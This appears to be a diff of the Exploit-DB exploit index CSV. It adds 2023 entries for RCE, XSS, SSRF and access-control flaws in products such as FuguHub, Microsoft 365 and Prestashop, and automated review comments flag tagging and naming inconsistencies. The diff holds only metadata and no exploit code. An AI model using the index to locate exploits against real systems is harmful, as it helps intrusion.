34206,exploits/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,webapps,hardware,80,2014-07-30,2014-07-30,0,OSVDB-109787;OSVDB-109786;OSVDB-109785,,,,, 34206,exploits/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,webapps,hardware,80,2014-07-30,2014-07-30,0,OSVDB-109787;OSVDB-109786;OSVDB-109785,,,,,
45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware,,2018-11-12,2018-11-13,0,,"Server-Side Request Forgery (SSRF)",,,, 45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware,,2018-11-12,2018-11-13,0,,"Server-Side Request Forgery (SSRF)",,,,
51556,exploits/hardware/webapps/51556.txt,"D-Link DAP-1325 - Broken Access Control",2023-07-03,ieduardogoncalves,webapps,hardware,,2023-07-03,2023-07-03,0,,,,,,
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,"Cross-Site Scripting (XSS)",,,, 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,"Cross-Site Scripting (XSS)",,,,
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,Traversal,,,, 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,Traversal,,,,
24442,exploits/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",webapps,hardware,,2013-01-31,2013-01-31,0,OSVDB-89697,,,,, 24442,exploits/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",webapps,hardware,,2013-01-31,2013-01-31,0,OSVDB-89697,,,,,
@ -5381,6 +5383,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43008,exploits/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,remote,java,,2017-10-17,2017-10-17,1,CVE-2017-12617,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cfaa34d2a4b688780cd21fa3a48deaa56698c52e/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb 43008,exploits/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,remote,java,,2017-10-17,2017-10-17,1,CVE-2017-12617,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cfaa34d2a4b688780cd21fa3a48deaa56698c52e/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
35211,exploits/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,remote,java,8001,2014-11-10,2014-11-10,1,CVE-2014-8516;OSVDB-114127,"Metasploit Framework (MSF)",,,, 35211,exploits/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,remote,java,8001,2014-11-10,2014-11-10,1,CVE-2014-8516;OSVDB-114127,"Metasploit Framework (MSF)",,,,
30514,exploits/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,webapps,java,,2007-08-21,2013-12-26,1,CVE-2007-4479;OSVDB-37097,,,,,https://www.securityfocus.com/bid/25391/info 30514,exploits/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,webapps,java,,2007-08-21,2013-12-26,1,CVE-2007-4479;OSVDB-37097,,,,,https://www.securityfocus.com/bid/25391/info
51564,exploits/java/webapps/51564.txt,"Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)",2023-07-03,tmrswrr,webapps,java,,2023-07-03,2023-07-03,0,,,,,,
29918,exploits/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,webapps,java,,2013-12-01,2013-12-01,0,OSVDB-100486,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php 29918,exploits/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,webapps,java,,2013-12-01,2013-12-01,0,OSVDB-100486,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php
50692,exploits/java/webapps/50692.txt,"Ametys CMS v4.4.1 - Cross Site Scripting (XSS)",2022-02-02,Vulnerability-Lab,webapps,java,,2022-02-02,2022-02-02,0,,,,,, 50692,exploits/java/webapps/50692.txt,"Ametys CMS v4.4.1 - Cross Site Scripting (XSS)",2022-02-02,Vulnerability-Lab,webapps,java,,2022-02-02,2022-02-02,0,,,,,,
44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000,2018-03-07,2018-03-07,0,CVE-2018-7739,,,,, 44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000,2018-03-07,2018-03-07,0,CVE-2018-7739,,,,,
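Review bot: The added row 51564 has an empty tags field even though its description is "Multiple Cross-Site Scripting (XSS)"; other XSS rows in this file, such as 45084, carry "Cross-Site Scripting (XSS)" there, so tag-based searches would miss the new entry. Add the tag for consistency.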
@ -11018,6 +11021,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info 19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info
21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,, 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,,
40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,, 40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,,
51555,exploits/multiple/remote/51555.txt,"Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)",2023-07-03,nu11secur1ty,remote,multiple,,2023-07-03,2023-07-03,0,CVE-2023-33137,,,,,
51552,exploits/multiple/remote/51552.txt,"Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)",2023-07-03,nu11secur1ty,remote,multiple,,2023-07-03,2023-07-03,0,CVE-2023-28285,,,,,
51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,, 51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,,
19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info 19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info
19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950 19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950
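Review bot: The two added rows (51555 and 51552) have identical descriptions apart from "32-bit" and "64-bit" but are mapped to different identifiers, CVE-2023-33137 and CVE-2023-28285. Confirm that each CVE is attached to the right row, and put the affected component in each description so the two entries can be told apart without opening the files. Their ids are also listed out of numeric order (51555 before 51552), which is worth a check if ordering within a title group matters.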
@ -11784,6 +11789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info 33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info
9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,, 9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,,
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7 43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,,
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,, 51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,, 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,, 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
@ -19292,6 +19298,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,, 48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,,2020-05-22,2020-05-22,0,,,,,, 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,,2020-05-22,2020-05-22,0,,,,,,
9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php,,2009-09-10,,1,OSVDB-58360;CVE-2009-3349;OSVDB-58359;CVE-2009-3348,,,,, 9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php,,2009-09-10,,1,OSVDB-58360;CVE-2009-3349;OSVDB-58359;CVE-2009-3348,,,,,
51559,exploits/php/webapps/51559.txt,"GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php,,2008-10-28,2014-03-26,1,CVE-2008-5064;OSVDB-49439,,,,,https://www.securityfocus.com/bid/31963/info 32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php,,2008-10-28,2014-03-26,1,CVE-2008-5064;OSVDB-49439,,,,,https://www.securityfocus.com/bid/31963/info
28815,exploits/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,webapps,php,,2006-10-14,2016-09-02,1,,,,,,https://www.securityfocus.com/bid/20532/info 28815,exploits/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,webapps,php,,2006-10-14,2016-09-02,1,,,,,,https://www.securityfocus.com/bid/20532/info
32449,exploits/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,webapps,php,,2008-10-01,2014-03-23,1,CVE-2008-4447;OSVDB-48857,,,,,https://www.securityfocus.com/bid/31524/info 32449,exploits/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,webapps,php,,2008-10-01,2014-03-23,1,CVE-2008-4447;OSVDB-48857,,,,,https://www.securityfocus.com/bid/31524/info
@ -27782,6 +27789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip, 8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip,
16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html 16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html
49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip, 49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip,
51565,exploits/php/webapps/51565.txt,"PodcastGenerator 3.2.9 - Blind SSRF via XML Injection",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,, 51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,, 26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,,
11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,, 11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,,
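Review bot: Row 51565 spells the product "PodcastGenerator", while the three older context rows in this hunk (8866, 16109, 49866) use "Podcast Generator". A title search on the two-word form returns those three and misses both 3.2.9 entries. Suggest "Podcast Generator 3.2.9 - Blind SSRF via XML Injection", and aligning the existing row 51454 in the same pass.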
@ -27852,6 +27860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21279,exploits/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,webapps,php,,2002-02-04,2012-09-12,1,OSVDB-87416,,,,,https://www.securityfocus.com/bid/4041/info 21279,exploits/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,webapps,php,,2002-02-04,2012-09-12,1,OSVDB-87416,,,,,https://www.securityfocus.com/bid/4041/info
28946,exploits/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20974/info 28946,exploits/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20974/info
27946,exploits/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,webapps,php,,2006-06-02,2013-08-30,1,,,,,,https://www.securityfocus.com/bid/18227/info 27946,exploits/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,webapps,php,,2006-06-02,2013-08-30,1,,,,,,https://www.securityfocus.com/bid/18227/info
51551,exploits/php/webapps/51551.txt,"POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)",2023-07-03,yuyudhn,webapps,php,,2023-07-03,2023-07-03,0,CVE-2023-36348,,,,,
17959,exploits/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,webapps,php,,2011-10-10,2011-10-10,0,OSVDB-76292;OSVDB-76288;OSVDB-76287,,,,, 17959,exploits/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,webapps,php,,2011-10-10,2011-10-10,0,OSVDB-76292;OSVDB-76288;OSVDB-76287,,,,,
39108,exploits/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",webapps,php,,2014-02-26,2015-12-26,1,CVE-2014-2211;OSVDB-103769,,,,,https://www.securityfocus.com/bid/65817/info 39108,exploits/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",webapps,php,,2014-02-26,2015-12-26,1,CVE-2014-2211;OSVDB-103769,,,,,https://www.securityfocus.com/bid/65817/info
18320,exploits/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",webapps,php,,2012-01-04,2012-01-04,1,OSVDB-82483;CVE-2012-5291,,,,, 18320,exploits/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",webapps,php,,2012-01-04,2012-01-04,1,OSVDB-82483;CVE-2012-5291,,,,,
@ -28048,6 +28057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,, 48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,,
49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,, 49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,,
49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,, 49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
51563,exploits/php/webapps/51563.txt,"Prestashop 8.0.4 - Cross-Site Scripting (XSS)",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,, 51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py 45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py
45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
@ -28784,6 +28794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,, 51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,,
51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,, 51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,,
51548,exploits/php/webapps/51548.txt,"Rukovoditel 3.4.1 - Multiple Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip, 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
